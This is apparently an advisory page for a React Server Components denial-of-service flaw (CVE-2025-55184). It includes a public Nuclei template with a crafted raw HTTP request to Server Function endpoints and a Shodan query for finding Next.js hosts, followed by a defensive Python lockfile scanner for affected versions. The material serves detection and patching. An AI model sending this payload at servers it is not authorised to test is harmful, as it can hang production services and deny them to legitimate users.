React Server Components 19.0.0 to 19.2.1 including react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack contain an insecure deserialization vulnerability caused by unsafe payload deserialization in Server Function endpoints, letting unauthenticated attackers cause denial of service by hanging the server process.
PoC code [public]
id: CVE-2025-55184

info:
  name: React Server Components - Denial of Service
  author: DhiyaneshDk
  severity: high
  description: |
    React Server Components 19.0.0 to 19.2.1 including react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack contain an insecure deserialization vulnerability caused by unsafe payload deserialization in Server Function endpoints, letting unauthenticated attackers cause denial of service by hanging the server process.
  impact: |
    Unauthenticated attackers can cause the server to hang indefinitely, resulting in denial of service and preventing legitimate requests.
  remediation: |
    Update to the latest version beyond 19.2.1.
  reference:
    - https://vercel.com/kb/bulletin/security-bulletin-cve-2025-55184-and-cve-2025-55183#patched-versions
    - https://www.facebook.com/security/advisories/cve-2025-55184
    - https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Next.js"
  tags: cve,cve2025,react,nextjs,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/x-component
        Content-Type: application/x-www-form-urlencoded
        Next-Action: x

        0=["$F1"]&1={"id":"x","bound":null}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - "contains(content_type, 'text/plain')"
          - "status_code == 404"
          - 'contains(body, "Server action not found")'
        condition: and
# digest: 490a0046304402202b75bfa6b03b29e3c4c5f5069098b7e1e7f21287c529501dd033431a26b826cc02207e4c94880fe6c7af1167f962b8401a20445fb27598c962b4b2ae475dd1b4481d:922c64590222798bb761d5b6d8e72950
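The remediation above is a version bump, so the practical check for a defender is whether a deployed application still pins one of the three affected packages inside the stated range. The following Python script is an added example, not part of the Nuclei template or the React project: it walks an npm package-lock.json (v2/v3 "packages" map, including nested node_modules entries) and reports any react-server-dom-parcel, react-server-dom-turbopack or react-server-dom-webpack entry whose version falls in 19.0.0 through 19.2.1 inclusive. The range is taken directly from the advisory text on this page; the lockfile contents (SAMPLE_LOCK) and package versions in it are constructed for the demonstration, and the list of patched releases in the Vercel bulletin should take precedence over this simple range comparison.

```python
import json
from typing import Dict, List, Tuple

# The three bindings named in the advisory. The "react" package itself is not listed.
AFFECTED_PACKAGES = {
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
    "react-server-dom-webpack",
}

# Affected range as stated on this page: 19.0.0 through 19.2.1, inclusive.
AFFECTED_MIN = (19, 0, 0)
AFFECTED_MAX = (19, 2, 1)


def parse_version(version: str) -> Tuple[int, int, int]:
    """Parse 'MAJOR.MINOR.PATCH'; any -prerelease or +build suffix is dropped,
    so a canary build of an affected release is treated as that release."""
    core = version.split("+", 1)[0].split("-", 1)[0]
    parts = core.split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unsupported version string: {version!r}")
    major, minor, patch = (int(p) for p in parts)
    return (major, minor, patch)


def is_affected(version: str) -> bool:
    """True when the version lies inside the advisory's affected range."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def find_affected(lockfile: dict) -> List[Dict[str, str]]:
    """Scan a package-lock.json (lockfileVersion 2 or 3) for affected packages.

    Keys in the "packages" map look like "node_modules/<name>" or, for nested
    installs, "node_modules/<parent>/node_modules/<name>"; the package name is
    whatever follows the last "node_modules/" segment.
    """
    findings: List[Dict[str, str]] = []
    for path, meta in lockfile.get("packages", {}).items():
        if not path:
            continue  # "" is the root project entry, not a dependency
        name = path.rsplit("node_modules/", 1)[-1]
        if name not in AFFECTED_PACKAGES:
            continue
        version = meta.get("version", "")
        try:
            affected = is_affected(version)
        except ValueError:
            affected = False  # unparseable version: leave it for manual review
        if affected:
            findings.append({"package": name, "version": version, "path": path})
    return findings


# Constructed sample lockfile (not from any real project): one top-level
# affected install, one nested canary install, one package outside the range.
SAMPLE_LOCK = {
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app"},
        "node_modules/react": {"version": "19.2.1"},
        "node_modules/react-server-dom-webpack": {"version": "19.2.1"},
        "node_modules/some-lib/node_modules/react-server-dom-turbopack": {
            "version": "19.1.0-canary-abc123"
        },
        "node_modules/react-server-dom-parcel": {"version": "19.3.0"},
    },
}


def scan_file(path: str) -> List[Dict[str, str]]:
    """Load a real package-lock.json from disk and scan it."""
    with open(path, "r", encoding="utf-8") as fh:
        return find_affected(json.load(fh))


if __name__ == "__main__":
    for finding in find_affected(SAMPLE_LOCK):
        print(f"AFFECTED {finding['package']}@{finding['version']} at {finding['path']}")
```

Run it against a real lockfile with scan_file("path/to/package-lock.json"); a hit means the application is still on a release inside the range named by the advisory and the remediation (upgrade past 19.2.1) has not been applied, regardless of what the HTTP probe in the template returns.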